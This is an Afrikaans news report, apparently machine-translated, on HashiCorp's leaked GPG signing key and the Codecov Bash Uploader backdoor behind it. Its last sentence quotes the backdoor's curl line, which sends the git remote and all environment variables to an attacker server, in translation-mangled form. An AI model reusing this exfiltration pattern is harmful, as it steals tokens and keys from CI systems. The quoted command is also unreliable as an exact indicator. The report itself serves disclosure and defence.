HashiCorp, bekend vir die ontwikkeling van die oopbronnutsgoed Vagrant, Packer, Nomad en Terraform, het die lekkasie aangekondig van die private GPG-sleutel wat gebruik word om digitale handtekeninge te skep wat vrystellings verifieer. Aanvallers wat toegang tot die GPG-sleutel verkry het, kan moontlik verborge veranderinge aan HashiCorp-produkte maak deur dit met 'n korrekte digitale handtekening te verifieer. Die maatskappy het terselfdertyd verklaar dat daar tydens die oudit geen spore van pogings om sulke wysigings aan te bring, geïdentifiseer is nie.
Tans is die gekompromitteerde GPG-sleutel herroep en 'n nuwe sleutel is in die plek daarvan ingestel. Die probleem het slegs verifikasie geraak deur die SHA256SUM- en SHA256SUM.sig-lêers te gebruik, en nie die generering van digitale handtekeninge vir Linux DEB- en RPM-pakkette wat deur releases.hashicorp.com verskaf word, sowel as vrystellingverifikasiemeganismes vir macOS en Windows (AuthentiCode) beïnvloed nie. .
Die lekkasie het plaasgevind as gevolg van die gebruik van die Codecov Bash Uploader (codecov-bash) skrif in die infrastruktuur, wat ontwerp is om dekkingsverslae van deurlopende integrasiestelsels af te laai. Tydens die aanval op die Codecov-maatskappy is 'n agterdeur in die gespesifiseerde skrif versteek, waardeur wagwoorde en enkripsiesleutels na die aanvallers se bediener gestuur is.
Om te hack, het die aanvallers gebruik gemaak van 'n fout in die proses om die Codecov Docker-beeld te skep, wat hulle in staat gestel het om toegangsdata na GCS (Google Cloud Storage) te onttrek, wat nodig is om veranderinge aan te bring aan die Bash Uploader-skrip wat vanaf die codecov.io versprei is webwerf. Die veranderinge is op 31 Januarie aangebring, het vir twee maande onopgemerk gebly en het aanvallers in staat gestel om inligting te onttrek wat in klante se deurlopende integrasiestelselomgewings gestoor is. Deur die bygevoegde kwaadwillige kode te gebruik, kon aanvallers inligting oor die getoetste Git-bewaarplek en alle omgewingsveranderlikes bekom, insluitend tokens, enkripsiesleutels en wagwoorde wat na deurlopende integrasiestelsels oorgedra word om toegang tot toepassingskode, bewaarplekke en dienste soos Amazon Web Services en GitHub te organiseer.
Benewens die direkte oproep, is die Codecov Bash Uploader-skrip gebruik as deel van ander oplaaiers, soos Codecov-action (Github), Codecov-circleci-orb en Codecov-bitrise-step, wie se gebruikers ook deur die probleem geraak word. Alle gebruikers van codecov-bash en verwante produkte word aanbeveel om hul infrastruktuur te oudit, sowel as om wagwoorde en enkripsiesleutels te verander. Jy kan die teenwoordigheid van 'n agterdeur in 'n skrif kontroleer deur die teenwoordigheid van die lynkrul -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /oplaai/v2 || waar
Bron: opennet.ru